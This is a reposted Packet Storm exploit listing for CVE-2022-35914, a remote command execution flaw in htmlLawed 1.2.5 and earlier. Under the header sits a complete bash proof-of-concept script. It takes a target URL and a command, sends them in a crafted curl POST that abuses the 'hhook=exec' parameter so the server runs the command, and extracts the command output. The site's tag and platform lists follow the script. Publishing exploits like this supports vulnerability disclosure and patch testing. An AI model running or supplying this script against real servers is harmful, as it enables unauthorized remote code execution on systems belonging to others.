- htmlLawed 1.2.5 Remote Command Execution
- Posted May 2, 2024
- Authored by d4t4s3c
htmlLawed versions 1.2.5 and below proof of concept remote command execution exploit.
- tags | exploit, remote, proof of concept
- advisories | CVE-2022-35914
- SHA-256 |
f7c13b91b7562803551ff2c81af4d91f8007cf734173bc191c1002abafa0fa8f
- Download | Favorite | View
#!/bin/bash# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution
# Date: 2024-05-02
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
# Software Link: https://github.com/kesar/HTMLawed
# Version: <= 1.2.5
# Tested on: Linux
# Category: Web Application
# CVE: CVE-2022-35914
while getopts ":u:c:" arg; do
case ${arg} in
u) url=${OPTARG}; let parameter_counter+=1 ;;
c) cmd=${OPTARG}; let parameter_counter+=1 ;;
esac
done
if [ -z "${url}" ] || [ -z "${cmd}" ]; then
echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"
echo -e "\n[-] Usage: CVE-2022-35914.sh -u <url> -c <cmd>\n"
exit 1
else
echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"
echo -e "\n[+] Executing Command: ${cmd}\n"
cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\ \[[0-9]+\] =\>' | sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/')
echo -e "${cmd_output}\n"
exit 0
fi
File Tags
- ActiveX (933)
- Advisory (85,077)
- Arbitrary (16,680)
- BBS (2,859)
- Bypass (1,834)
- CGI (1,032)
- Code Execution (7,642)
- Conference (689)
- Cracker (844)
- CSRF (3,373)
- DoS (24,645)
- Encryption (2,383)
- Exploit (52,859)
- File Inclusion (4,253)
- File Upload (987)
- Firewall (822)
- Info Disclosure (2,855)
- Intrusion Detection (907)
- Java (3,128)
- JavaScript (890)
- Kernel (7,040)
- Local (14,718)
- Magazine (586)
- Overflow (13,081)
- Perl (1,431)
- PHP (5,201)
- Proof of Concept (2,371)
- Protocol (3,703)
- Python (1,604)
- Remote (31,448)
- Root (3,618)
- Rootkit (523)
- Ruby (619)
- Scanner (1,650)
- Security Tool (7,983)
- Shell (3,258)
- Shellcode (1,217)
- Sniffer (900)
- Spoof (2,261)
- SQL Injection (16,541)
- TCP (2,425)
- Trojan (689)
- UDP (899)
- Virus (669)
- Vulnerability (32,651)
- Web (9,885)
- Whitepaper (3,775)
- x86 (967)
- XSS (18,183)
- Other
Systems
- AIX (429)
- Apple (2,078)
- BSD (376)
- CentOS (58)
- Cisco (1,927)
- Debian (7,025)
- Fedora (1,693)
- FreeBSD (1,246)
- Gentoo (4,467)
- HPUX (880)
- iOS (373)
- iPhone (108)
- IRIX (220)
- Juniper (69)
- Linux (49,477)
- Mac OS X (691)
- Mandriva (3,105)
- NetBSD (256)
- OpenBSD (488)
- RedHat (15,700)
- Slackware (941)
- Solaris (1,611)
- SUSE (1,444)
- Ubuntu (9,478)
- UNIX (9,394)
- UnixWare (187)
- Windows (6,653)
- Other
文章来源: https://packetstormsecurity.com/files/178425/CVE-2022-35914.sh.txt
如有侵权请联系:admin#unsafe.sh